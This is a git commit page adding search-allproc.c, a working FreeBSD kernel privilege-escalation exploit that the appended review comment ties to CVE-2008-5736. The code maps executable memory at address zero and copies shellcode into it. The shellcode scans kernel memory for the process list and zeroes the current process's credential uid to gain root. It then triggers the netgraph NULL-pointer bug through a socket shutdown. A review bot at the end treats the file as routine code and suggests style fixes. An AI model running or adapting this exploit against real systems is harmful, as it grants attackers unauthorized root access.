authorAdam Weiss <adam@signal11.com>2011-02-26 21:15:01 -0500
committerAdam Weiss <adam@signal11.com>2011-02-26 21:15:01 -0500
commit71c0068b8a7ea89731fcd074a273a77671be08d1 (patch)
treefbdd14efa09e23c858616e91744fc87c7526d093
parentImport Don Bailey's original exploit code. (diff)
Instead of going to a fixed place, as Don does, search the entire kernel for the locks that are commonly before allproc.
-rw-r--r--search-allproc.c148
1 files changed, 148 insertions, 0 deletions
diff --git a/search-allproc.c b/search-allproc.c
new file mode 100644
index 0000000..aa8e1a7
--- /dev/null
+++ b/search-allproc.c
@@ -0,0 +1,148 @@
+#include <sys/param.h>
+#include <sys/mman.h>
+#include <sys/time.h>
+#include <sys/stat.h>
+#include <sys/proc.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netgraph/ng_socket.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <errno.h>
+
+#define PAGES 1
+#define PATTERN1 0x8f8f8f8f
+#define PATTERN2 0x6e6e6e6e
+
+typedef unsigned long ulong;
+typedef unsigned char uchar;
+
+int
+x(void)
+{
+ struct proc * p = 0x0;
+ uint * i;
+ uint *base = (uint *)0xc0000000;
+
+ while(1)
+ {
+ if (
+ /* allproc_lock */
+ (*base & 0xc0000000) == 0xc0000000 &&
+ (*(base+1) & 0xc0000000) == 0xc0000000 &&
+ (*(base+2) & 0xc0000000) == 0xc0000000 &&
+ (*(base+3) == 0x003b0000) &&
+ (*(base+7) == 0x00000001) &&
+ /* proctree_lock */
+ (*(base+16) & 0xc0000000) == 0xc0000000 &&
+ (*(base+17) & 0xc0000000) == 0xc0000000 &&
+ (*(base+18) & 0xc0000000) == 0xc0000000 &&
+ (*(base+19) == 0x003b0000) &&
+ (*(base+23) == 0x00000001) &&
+ /* pargs_ref_lock */
+ (*(base+32) & 0xc0000000) == 0xc0000000 &&
+ (*(base+33) & 0xc0000000) == 0xc0000000 &&
+ (*(base+34) & 0xc0000000) == 0xc0000000 &&
+ (*(base+35) == 0x00030000) &&
+ (*(base+39) == 0x00000004) &&
+ /* ppeers_lock */
+ (*(base+48) & 0xc0000000) == 0xc0000000 &&
+ (*(base+49) & 0xc0000000) == 0xc0000000 &&
+ (*(base+50) & 0xc0000000) == 0xc0000000 &&
+ (*(base+51) == 0x00030000) &&
+ (*(base+55) == 0x00000004) &&
+ /* allproc */
+ (*(base+57) & 0xc0000000) == 0xc0000000 &&
+ (*(base+58) == 0x0) )
+ {
+ base = base+57;
+ break;
+ }
+ base++;
+ }
+
+ p = (struct proc *)base;
+
+ while(1)
+ {
+ if(p->p_pid == PATTERN2)
+ {
+ i = (uint * )p->p_ucred;
+ *++i = 0;
+ break;
+ }
+
+ p = p->p_list.le_next;
+ }
+
+ return 1;
+}
+
+int
+main(int argc, char * argv[])
+{
+ ulong addr;
+ uchar * c;
+ uchar * d;
+ uint * i;
+ void * v;
+ int pid;
+ int s;
+
+ v = mmap(
+ NULL,
+ (PAGES*PAGE_SIZE),
+ PROT_READ|PROT_WRITE|PROT_EXEC,
+ MAP_ANON|MAP_FIXED,
+ -1,
+ 0);
+ if(v == MAP_FAILED)
+ {
+ perror("mmap");
+ return 0;
+ }
+
+ c = v;
+ d = (uchar * )x;
+ while(1)
+ {
+ *c = *d;
+ if(*d == 0xc3)
+ {
+ break;
+ }
+
+ d++;
+ c++;
+ }
+
+ *c++ = 0xc3;
+
+
+ c=v;
+ pid = getpid();
+ while(1)
+ {
+ if(*(long * )c == PATTERN2)
+ {
+ *(c + 0) = pid >> 0;
+ *(c + 1) = pid >> 8;
+ *(c + 2) = pid >> 16;
+ *(c + 3) = pid >> 24;
+ break;
+ }
+ c++;
+ }
+
+ s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
+ if(s < 0)
+ {
+ perror("socket");
+ return 1;
+ }
+
+ shutdown(s, SHUT_RDWR);
+
+ return 0;
+}
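Review bot: The two failure paths in main() exit with different statuses: after `perror("mmap")` the new code does `return 0;`, while after `perror("socket")` it does `return 1;`, so a wrapper or test harness cannot distinguish an mmap failure from a clean run. Make the mmap path `return 1;` as well (or `return EXIT_FAILURE;` from the already-included stdlib.h) so every error exit is non-zero. `argc` and `argv` are never read, so the signature can be `main(void)`. The file also has no header comment; a short one naming the CVE this proof-of-concept relates to (the repository name says CVE-2008-5736) and the kernel build the hard-coded constants in x() were taken from would let a reader judge applicability without reverse-engineering the magic values.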